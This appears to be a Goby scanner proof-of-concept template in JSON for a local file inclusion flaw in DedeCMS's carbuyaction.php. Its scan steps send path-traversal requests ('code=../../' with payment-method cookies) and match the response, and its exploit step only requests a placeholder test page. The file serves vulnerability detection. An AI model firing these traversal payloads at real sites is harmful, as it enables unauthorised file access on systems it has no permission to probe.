Goby/json/DedeCMS_Carbuyaction_FileIn...

130 lines
4.7 KiB
JSON

{
"Name": "DedeCMS Carbuyaction FileInclude",
"Level": "2",
"Tags": [
"FileInclude"
],
"GobyQuery": "app=\"DedeCMS\"",
"Description": "Dream Weaving (DedeCMS) Official Website- Content Management System- Shanghai Zhuozhuo Network Technology Co., Ltd.",
"Product": "DedeCMS",
"Homepage": "http://www.dedecms.com/",
"Author": "",
"Impact": "DedeCMS Carbuyaction.php has a local file inclusion vulnerability.",
"Recommendation": "",
"References": [
"https://www.cnblogs.com/milantgh/p/3615986.html"
],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/plus/carbuyaction.php?dopost=return&code=../../",
"follow_redirect": true,
"header": {
"Cookie": "code=alipay"
},
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
},
{
"Request": {
"method": "GET",
"uri": "/plus/carbuyaction.php?dopost=return&code=../../",
"follow_redirect": true,
"header": {
"Cookie": "code=cod"
},
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "Cod::respond()",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}